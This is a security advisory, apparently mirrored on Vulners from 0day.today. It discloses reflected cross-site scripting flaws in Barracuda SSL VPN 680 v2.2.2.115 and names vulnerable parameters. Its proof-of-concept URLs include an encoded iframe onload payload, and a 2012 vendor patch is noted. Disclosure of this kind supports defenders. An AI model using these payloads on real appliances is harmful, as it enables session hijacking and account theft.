Vulners
Lucene search
Barracuda SSL VPN 680 Cross Site Scripting
Barracuda SSL VPN 680 - Cross Site Scripting Vulnerabilities
Introduction:
=============
The Barracuda SSL VPN is an integrated hardware and software solution enabling secure, clientless remote
access to internal network resources from any Web browser. Designed for remote employees and road warriors,
the Barracuda SSL VPN provides comprehensive control over file systems and Web-based applications requiring
external access. The Barracuda SSL VPN integrates with third-party authentication mechanisms to control user
access levels and provides single sign-on.
Barracuda SSL VPN
* Enables access to corporate intranets, file systems or other Web-based applications
* Tracks resource access through auditing and reporting facilities
* Scans uploaded files for viruses and malware
* Leverages multi-factor, layered authentication mechanisms, including RSA SecurID and VASCO tokens
* Integrates with existing Active Directory and LDAP directories
* Utilizes policies for granular access control framework
* Supports any Web browser on PC or Mac
(Copy of the Vendor Homepage: http://www.barracudanetworks.com/ns/products/sslvpn.php)
Details:
========
Multiple non persistent cross site scripting vulnerabilities are detected in Barracuda SSL VPN 680 v2.2.2.115 appliance application.
The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with high required
user inter action. The bugs are located in the fileSystem.do, showUserResourceCategories.do,launchAgent.do files with the bound
vulnerable policyLaunching, resourcePrefix, path & return-To parameters. Successful exploitation can result in account steal,
phishing & client-side content request manipulation.
Vulnerable Module(s):
[+] showUserResourceCategories.do&messageResourcesKey=resourceCategory
[+] fileSystem.do?launchId=l52ca6d&actionTarget=list&path=
[+] launchAgent.do
Vulnerable Parameter(s):
[+] policyLaunching & resourcePrefix
[+] list&path
[+] return-To
Proof of Concept:
=================
The client side cross site scripting vulnerabilities can be exploited by remote attackers with medium or high required user inter action.
For demonstration or reproduce ...
1.1
https://sslvpn.[SERVER]/resourceList.do?form=resourceCategoriesForm&readOnly=test&path=
%2FshowUserResourceCategories.do&messageResourcesKey=resourceCategory&actionPath=[NON-PERSISTENT SCRIPT CODE!]
1.2
https://sslvpn.[SERVER]/[FILE].do?[VALUE #1]=l52ca6d&[VALUE #2]=[VALUE #3]&[PATH LISTING]=smb/Sales%20Folder/Opt/[NON-PERSISTENT SCRIPT CODE!]
PoC:
https://sslvpn.[SERVER]/fileSystem.do?launchId=l52ca6d&actionTarget=list&path=smb/Sales%20Folder/Testing
%20from%20Tri%20Opt/%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
1.3
https://sslvpn.[SERVER]/launchAgent.do?launchId=l3ce418&returnTo=[NON-PERSISTENT SCRIPT CODE!]
Solution:
=========
2012-07-14: Vendor Fix/Patch by Barracuda Networks
Risk:
=====
The security risk of the non-persistent cross site scripting vulnerabilities are estimated as medium(-).
# 0day.today [2018-02-06] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Jul 2012 00:00Current
7.1High risk
Vulners AI Score7.1